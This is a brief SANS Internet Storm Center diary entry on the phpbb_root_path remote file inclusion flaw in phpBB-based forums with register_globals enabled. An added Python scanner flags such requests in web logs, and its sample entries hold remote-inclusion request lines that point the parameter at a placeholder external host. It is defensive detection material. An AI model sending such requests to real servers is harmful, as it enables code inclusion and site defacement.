
SANS ISC: Classic phpBB vulnerability impacts phpBB-based forums - SANS Internet Storm Center


It seems fairly obvious, but the classic phpbb_root_path vulnerability is present in phpBB-based products such as Omegaboard, Cerulean Portal System, phpBB Tweaked, Hailboards, EclipseBB and Xero Portal. All are affected when register_globals is set to "on". It also appears to be regularly exploited to deface systems.
www.heise-security.co.uk/news/84732
Thanks for the lead, Juergen!
Kevin Liston

ISC Handler
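A log check for the request pattern this diary describes, as an added example that is not part of the original post: it flags access-log entries in which a client supplies phpbb_root_path as a request parameter, the situation register_globals turns into a script variable. It assumes Apache-style common/combined logs and a query-string parameter (POST bodies and cookies do not appear in these logs); the sample entries, addresses, host and script paths are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Matches the client address, request line and status of a common/combined log entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)
PARAM = "phpbb_root_path"  # PHP variable names are case-sensitive, so match exactly


def scan_line(line):
    """Return a finding if the request supplies phpbb_root_path, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes names and values once (phpbb%5Froot%5Fpath is caught).
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # PHP maps the array forms name[] and name[key] to the same variable name.
        if name.split("[", 1)[0] != PARAM:
            continue
        return {
            "ip": m.group("ip"),
            "path": parts.path,
            "status": int(m.group("status")),
            # Decode once more so a double-encoded URL is still classified.
            "remote_value": bool(SCHEME_RE.match(unquote(value))),
        }
    return None


def scan_log(lines):
    return [f for f in map(scan_line, lines) if f]


# Constructed sample entries (documentation addresses, placeholder host and paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:01 +0000] "GET /board/viewtopic.php?t=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2007:10:00:05 +0000] "GET /board/page.php?phpbb_root_path=http://example.invalid/x.txt? HTTP/1.0" 200 312',
    '198.51.100.7 - - [01/Jan/2007:10:00:09 +0000] "GET /portal/page.php?phpbb%5Froot%5Fpath=http%253A%252F%252Fexample.invalid%252Fx HTTP/1.0" 404 210',
    '203.0.113.5 - - [01/Jan/2007:10:00:12 +0000] "GET /board/index.php?phpbb_root_path=./ HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 status only shows that the script answered, not that the request had any effect, so treat every hit as a lead to review alongside the register_globals setting on that host.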
